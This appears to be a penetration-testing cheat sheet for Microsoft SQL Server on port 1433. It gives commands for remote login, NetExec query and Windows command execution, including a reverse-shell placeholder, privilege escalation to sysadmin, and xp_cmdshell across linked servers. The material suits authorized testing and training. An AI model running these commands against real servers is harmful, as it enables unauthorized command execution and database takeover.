MsSQL - 1433

Microsoft SQL Server (MS SQL) is a relational database management system developed by Microsoft that supports a wide variety of transaction processing, business intelligence, and analytics applications. It uses Transact-SQL (T-SQL), Microsoft's proprietary extension of SQL, to interact with the database.

Default port: 1433

Connecting to MSSQL Remotely

# Using Impacket MSSQL Client
python3 /opt/impacket/build/scripts-3.12/mssqlclient.py 'sqladm_usr':'CoolPass123@'@10.10.10.10 -windows-auth

# Using Sqsh
sqsh -S 10.10.10.10 -U Jethalal -P 'CoolJethalal123@' -h
sqsh -S 10.10.10.10 -U .\\sqladm_usr -P 'CoolPass123@' -h

Enumeration & Attacks

If we gather a user with database admin or MSSQL permissions, or just a SQL service account, we can use NetExec/CrackMapExec to enumerate and attack remotely. There are various ways, but NetExec/CrackMapExec makes life easier.

info

If we see (Pwn3d!) in NetExec, it means that the account is Database Admin.

Execute Queries

nxc mssql 10.10.10.10 -u rezydev -p 'Password123@' -q "SELECT name FROM master.dbo.sysdatabases"
nxc mssql 10.10.10.10 -u rezydev -p 'Password123@' -q "QUERY HERE"

# If we have sql windows account we would use flag '--local-auth'.

Execute Windows Commands

# Execute Windows Commands
nxc mssql 10.10.10.10 -u "sqlsvc" -p 'Password123@' --local-auth -x "whoami"
nxc mssql 10.10.10.10 -u "sqlsvc" -p 'Password123@' --local-auth -x "revshells.com powershell (#3)"

Privilege Escalation Module

NetExec's mssql_priv module helps escalate MSSQL user privileges to sysadmin. It checks two methods: EXECUTE AS LOGIN and the db_owner role. The module has three options:

enum_privs (default) to list privileges
privesc to escalate
rollback to revert changes

# List Options
nxc mssql -M mssql_priv --options

# Check if user 'rezydev' can impersonate sysadmin
nxc mssql 10.10.10.10 -u "rezydev" -p "Password123@" -M mssql_priv

# If yes, use option 'privesc' to escalate and now rezydev is also sysadmin
nxc mssql 10.10.10.10 -u "rezydev" -p "Password123@" -M mssql_priv -o ACTION=privesc

# Since above command made our user sysadmin, we can now use -x to execute commands
# as sysadmin user.

# We can also use '-o ACTION=rollback' to revert previous action.

Communicate with other Databases

-- Enumerate linked servers
EXEC sp_linkedservers;

-- Get details on a linked server
EXEC sp_helpserver;

-- Execute a command on the linked server (if allowed)
EXEC ('EXEC xp_cmdshell ''whoami''') AT [LINKEDSRVNAME];

-- Read data from remote DB
SELECT * FROM OPENQUERY([LINKEDSRVNAME], 'SELECT name FROM master..sysdatabases');

Connecting to MSSQL Remotely​

Enumeration & Attacks​

Execute Queries​

Execute Windows Commands​

Privilege Escalation Module​

Communicate with other Databases​